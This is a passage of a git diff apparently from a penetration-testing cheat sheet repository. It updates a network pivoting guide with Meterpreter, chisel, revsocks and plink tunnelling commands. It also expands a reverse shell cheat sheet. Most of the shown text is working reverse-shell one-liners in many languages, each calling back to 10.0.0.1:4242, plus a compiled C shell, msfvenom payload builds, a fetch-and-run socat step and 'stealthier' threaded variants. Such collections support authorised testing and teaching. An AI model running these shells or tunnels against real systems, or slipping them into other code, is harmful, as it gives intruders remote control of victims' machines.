+  * [Remote Port Forwarding](#remote-port-forwarding)
+* [Proxychains](#proxychains)
+* [Web SOCKS - reGeorg](#web-socks---regeorg)
+* [Metasploit](#metasploit)
+* [sshuttle](#sshuttle)
+* [chisel](#chisel)
+* [Rpivot](#rpivot)
+* [RevSocks](#revsocks)
+* [plink](#plink)
+* [ngrok](#ngrok)
+* [Basic Pivoting Types](#basic-pivoting-types)
+  * [Listen - Listen](#listen---listen)
+  * [Listen - Connect](#listen---connect)
+  * [Connect - Connect](#connect---connect)
+* [References](#references)
+
 ## Windows netsh Port Forwarding
 
 ```powershell
@@ -42,6 +64,7 @@ ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
 
 ```bash
 ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
+ssh -R 3389:10.1.1.224:3389 root@10.11.0.32
 ```
 
 ## Proxychains
@@ -83,14 +106,62 @@ optional arguments:
 
 ## Metasploit
 
-```c
-portfwd list
+```powershell
+# Meterpreter list active port forwards
+portfwd list 
+
+# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
+portfwd add –l 3389 –p 3389 –r target-host 
+portfwd add -l 88 -p 88 -r 127.0.0.1
 portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445
 
+# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
+portfwd delete –l 3389 –p 3389 –r target-host 
+# Meterpreter delete all port forwards
+portfwd flush 
+
 or
 
-run autoroute -s 192.168.57.0/24
+# Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0
+run autoroute -s 192.168.15.0/24 
 use auxiliary/server/socks4a
+
+# Meterpreter list all active routes
+run autoroute -p 
+
+route #Meterpreter view available networks the compromised host can access
+# Meterpreter add route for 192.168.14.0/24 via Session number.
+route add 192.168.14.0 255.255.255.0 3 
+# Meterpreter delete route for 192.168.14.0/24 via Session number.
+route delete 192.168.14.0 255.255.255.0 3 
+# Meterpreter delete all routes
+route flush 
+```
+
+## sshuttle
+
+Transparent proxy server that works as a poor man's VPN. Forwards over ssh. 
+
+* Doesn't require admin. 
+* Works with Linux and MacOS.
+* Supports DNS tunneling.
+
+```powershell
+pacman -Sy sshuttle
+apt-get install sshuttle
+sshuttle -vvr user@10.10.10.10 10.1.1.0/24
+sshuttle -vvr username@pivot_host 10.2.2.0/24 
+```
+
+## chisel
+
+
+```powershell
+go get -v github.com/jpillora/chisel
+
+# forward port 389 and 88 to hacker computer
+user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389 
+user@hacker$ /opt/chisel/chisel server -p 8008 --reverse
 ```
 
 ## Rpivot
@@ -122,12 +193,52 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro
 --hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE
 ```
 
+## revsocks
+
+```powershell
+# Listen on the server and create a SOCKS 5 proxy on port 1080
+user@VPS$ ./revsocks -listen :8443 -socks 127.0.0.1:1080 -pass Password1234
+
+# Connect client to the server
+user@PC$ ./revsocks -connect 10.10.10.10:8443 -pass Password1234
+user@PC$ ./revsocks -connect 10.10.10.10:8443 -pass Password1234 -proxy proxy.domain.local:3128 -proxyauth Domain/userpame:userpass -useragent "Mozilla 5.0/IE Windows 10"
+```
+
+
+```powershell
+# Build for Linux
+git clone https://github.com/kost/revsocks
+export GOPATH=~/go
+go get github.com/hashicorp/yamux
+go get github.com/armon/go-socks5
+go get github.com/kost/go-ntlmssp
+go build
+go build -ldflags="-s -w" && upx --brute revsocks
+
+# Build for Windows
+go get github.com/hashicorp/yamux
+go get github.com/armon/go-socks5
+go get github.com/kost/go-ntlmssp
+GOOS=windows GOARCH=amd64 go build -ldflags="-s -w"
+go build -ldflags -H=windowsgui
+upx revsocks
+```
+
+
 ## plink
 
 ```powershell
-plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389    --> exposes the RDP port of the machine in the port 3390 of the SSH Server
+# exposes the SMB port of the machine in the port 445 of the SSH Server
+plink -l root -pw toor -R 445:127.0.0.1:445 
+# exposes the RDP port of the machine in the port 3390 of the SSH Server
+plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389  
+
 plink -l root -pw mypassword 192.168.18.84 -R
+plink.exe -v -pw mypassword user@10.10.10.10 -L 6666:127.0.0.1:445
+
 plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
+# redirects the Windows port 445 to Kali on port 22
+plink -P 22 -l root -pw some_password -C -R 445:127.0.0.1:445 192.168.12.185   
 ```
 
 ## ngrok
@@ -154,7 +265,7 @@ unzip ngrok-stable-linux-amd64.zip
 | Listen - Connect  | Normal redirect.                            |
 | Connect - Connect | Can’t bind, so connect to bridge two hosts  |
 
-## Listen - Listen
+### Listen - Listen
 
 | Type              | Use Case                                    |
 | :-------------    | :------------------------------------------ |
@@ -163,7 +274,7 @@ unzip ngrok-stable-linux-amd64.zip
 | remote host 1     | `ncat localhost 8080 < file`                |
 | remote host 2     | `ncat localhost 9090 > newfile`             |
 
-## Listen - Connect
+### Listen - Connect
 
 | Type              | Use Case                                                        |
 | :-------------    | :------------------------------------------                     |
@@ -172,13 +283,13 @@ unzip ngrok-stable-linux-amd64.zip
 | remote host 1     | `ncat localhost -p 8080 < file`                                 |
 | remote host 2     | `ncat -l -p 9090 > newfile`                                     |
 
-## Connect - Connect
+### Connect - Connect
 
 | Type              | Use Case                                                                   |
 | :-------------    | :------------------------------------------                                |
 | ncat              | `ncat localhost 8080 -c "ncat localhost 9090"`                             |
 | socat             | `socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090` |
-| remote host 1     | `ncat -l -p 8080 < file                                                    |
+| remote host 1     | `ncat -l -p 8080 < file`                                                   |
 | remote host 2     | `ncat -l -p 9090 > newfile`                                                |
 
 ## References
@@ -187,4 +298,5 @@ unzip ngrok-stable-linux-amd64.zip
 * [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/)
 * [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences)
 * [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/)
-* [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/)
\ No newline at end of file
+* [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/)
+* [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/)
\ No newline at end of file
diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
index 41435de8..a728c334 100644
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md	
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md	
@@ -5,6 +5,7 @@
 * [Reverse Shell](#reverse-shell)
     * [Bash TCP](#bash-tcp)
     * [Bash UDP](#bash-udp)
+    * [Socat](#socat)
     * [Perl](#perl)
     * [Python](#python)
     * [PHP](#php)
@@ -17,10 +18,20 @@
     * [Powershell](#powershell)
     * [Awk](#awk)
     * [Java](#java)
+    * [Java Alternative 1](#java-alternative-1)
+    * [Java Alternative 2](#java-alternative-2)
     * [War](#war)
     * [Lua](#lua)
     * [NodeJS](#nodejs)
     * [Groovy](#groovy)
+    * [Groovy Alternative 1](#groovy-alternative-1)
+    * [C](#c)
+* [Meterpreter Shell](#meterpreter-shell)
+    * [Windows Staged reverse TCP](#windows-staged-reverse-tcp)
+    * [Windows Stageless reverse TCP](#windows-stageless-reverse-tcp)
+    * [Linux Staged reverse TCP](#linux-staged-reverse-tcp)
+    * [Linux Stageless reverse TCP](#linux-stageless-reverse-tcp)
+    * [Other platforms](#other-platforms)
 * [Spawn TTY Shell](#spawn-tty-shell)
 * [References](#references)
 
@@ -29,31 +40,45 @@
 ### Bash TCP
 
 ```bash
-bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
+bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
 
-0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196
+0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196
 ```
 
 ### Bash UDP
 
 ```bash
 Victim:
-sh -i >& /dev/udp/127.0.0.1/4242 0>&1
+sh -i >& /dev/udp/10.0.0.1/4242 0>&1
 
 Listener:
 nc -u -lvp 4242
 ```
 
+Don't forget to check with others shell : sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash
+
+### Socat
+
+```powershell
+user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242
+user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242
+```
+```powershell
+user@victim$ wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242
+```
+
+Static socat binary can be found at [https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat)
+
 ### Perl
 
 ```perl
-perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
+perl -e 'use Socket;$i="10.0.0.1";$p=4242;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
 
-perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
+perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:4242");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
 
 
 NOTE: Windows only
-perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
+perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:4242");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
 ```
 
 ### Python
@@ -62,90 +87,97 @@ Linux only
 
 IPv4
 ```python
-export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
+export RHOST="10.0.0.1";export RPORT=4242;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
 ```
 
 IPv4
 ```python
-python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
+python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
 ```
 
 IPv6
 ```python
-python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' 
+python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
 ```
 
 ```python
-python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
+python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
 ```
 
 Windows only
 
 ```powershell
-C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
+C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.0.0.1', 4242)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
 ```
 
 ### PHP
 
 ```bash
-php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
+php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
+```
+
+```bash
+php -r '$sock=fsockopen("10.0.0.1",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
 ```
 
 ### Ruby
 
 ```ruby
-ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
+ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",4242).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
 
-ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
+ruby -rsocket -e 'exit if fork;c=TCPSocket.new("10.0.0.1","4242");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
 
 NOTE: Windows only
-ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
+ruby -rsocket -e 'c=TCPSocket.new("10.0.0.1","4242");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
 ```
 
 ### Golang
 
 ```bash
-echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
+echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","10.0.0.1:4242");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
 ```
 
 ### Netcat Traditional
 
 ```bash
-nc -e /bin/sh [IPADDR] [PORT]
+nc -e /bin/sh 10.0.0.1 4242
+nc -e /bin/bash 10.0.0.1 4242
+nc -c bash 10.0.0.1 4242
 ```
 
 ### Netcat OpenBsd
 
 ```bash
-rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
+rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
 ```
 
 ### Ncat
 
 ```bash
-ncat 127.0.0.1 4444 -e /bin/bash
-ncat --udp 127.0.0.1 4444 -e /bin/bash
+ncat 10.0.0.1 4242 -e /bin/bash
+ncat --udp 10.0.0.1 4242 -e /bin/bash
 ```
 
 ### OpenSSL
 
+Attacker:
 ```powershell
-hacker@kali$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
-hacker@kali$ openssl s_server -quiet -key key.pem -cert cert.pem -port 4242
+user@attack$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
+user@attack$ openssl s_server -quiet -key key.pem -cert cert.pem -port 4242
 or
-hacker@kali$ ncat --ssl -vv -l -p 4242
+user@attack$ ncat --ssl -vv -l -p 4242
 
-user@company$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 127.0.0.1:4242 > /tmp/s; rm /tmp/s
+user@victim$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.0.0.1:4242 > /tmp/s; rm /tmp/s
 ```
 
 ### Powershell
 
 ```powershell
-powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
+powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
 ```
 
 ```powershell
-powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
+powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
 ```
 
 ```powershell
@@ -155,21 +187,44 @@ powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubuse
 ### Awk
 
 ```powershell
-awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
+awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
 ```
 
 ### Java
 
 ```java
 r = Runtime.getRuntime()
-p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
+p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/4242;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
 p.waitFor()
+
+```
+
+#### Java Alternative 1
+
+```java
+String host="127.0.0.1";
+int port=4444;
+String cmd="cmd.exe";
+Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
+
+```
+
+#### Java Alternative 2
+**NOTE**: This is more stealthy
+
+```java
+Thread thread = new Thread(){
+    public void run(){
+        // Reverse shell here
+    }
+}
+thread.start();
 ```
 
 ### War
 
 ```java
-msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war
+msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f war > reverse.war
 strings reverse.war | grep jsp # in order to get the name of the file
 ```
 
@@ -179,13 +234,13 @@ strings reverse.war | grep jsp # in order to get the name of the file
 Linux only
 
 ```powershell
-lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
+lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','4242');os.execute('/bin/sh -i <&3 >&3 2>&3');"
 ```
 
 Windows and Linux
 
 ```powershell
-lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
+lua5.1 -e 'local host, port = "10.0.0.1", 4242 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
 ```
 
 ### NodeJS
@@ -196,7 +251,7 @@ lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket")
         cp = require("child_process"),
         sh = cp.spawn("/bin/sh", []);
     var client = new net.Socket();
-    client.connect(8080, "10.17.26.64", function(){
+    client.connect(4242, "10.0.0.1", function(){
         client.pipe(sh.stdin);
         sh.stdout.pipe(client);
         sh.stderr.pipe(client);
@@ -207,12 +262,12 @@ lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket")
 
 or
 
-require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
+require('child_process').exec('nc -e /bin/sh 10.0.0.1 4242')
 
 or
 
 -var x = global.process.mainModule.require
--x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
+-x('child_process').exec('nc 10.0.0.1 4242 -e /bin/bash')
 
 or
 
@@ -224,18 +279,113 @@ https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
 by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
 NOTE: Java reverse shell also work for Groovy
 
-```javascript
-String host="localhost";
-int port=8044;
+```java
+String host="10.0.0.1";
+int port=4242;
 String cmd="cmd.exe";
 Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
 ```
 
+#### Groovy Alternative 1
+**NOTE**: This is more stealthy
+
+```java
+Thread.start {
+    // Reverse shell here
+}
+```
+
+### C
+
+Compile with `gcc /tmp/shell.c --output csh && csh`
+
+```csharp
+#include <stdio.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+
+int main(void){
+    int port = 4242;
+    struct sockaddr_in revsockaddr;
+
+    int sockt = socket(AF_INET, SOCK_STREAM, 0);
+    revsockaddr.sin_family = AF_INET;       
+    revsockaddr.sin_port = htons(port);
+    revsockaddr.sin_addr.s_addr = inet_addr("10.0.0.1");
+
+    connect(sockt, (struct sockaddr *) &revsockaddr, 
+    sizeof(revsockaddr));
+    dup2(sockt, 0);
+    dup2(sockt, 1);
+    dup2(sockt, 2);
+
+    char * const argv[] = {"/bin/sh", NULL};
+    execve("/bin/sh", argv, NULL);
+
+    return 0;       
+}
+```
+
+## Meterpreter Shell
+
+### Windows Staged reverse TCP
+
+```powershell
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f exe > reverse.exe
+```
+
+### Windows Stageless reverse TCP
+
+```powershell
+msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f exe > reverse.exe
+```
+
+### Linux Staged reverse TCP
+
+```powershell
+msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f elf >reverse.elf
+```
+
+### Linux Stageless reverse TCP
+
+```powershell
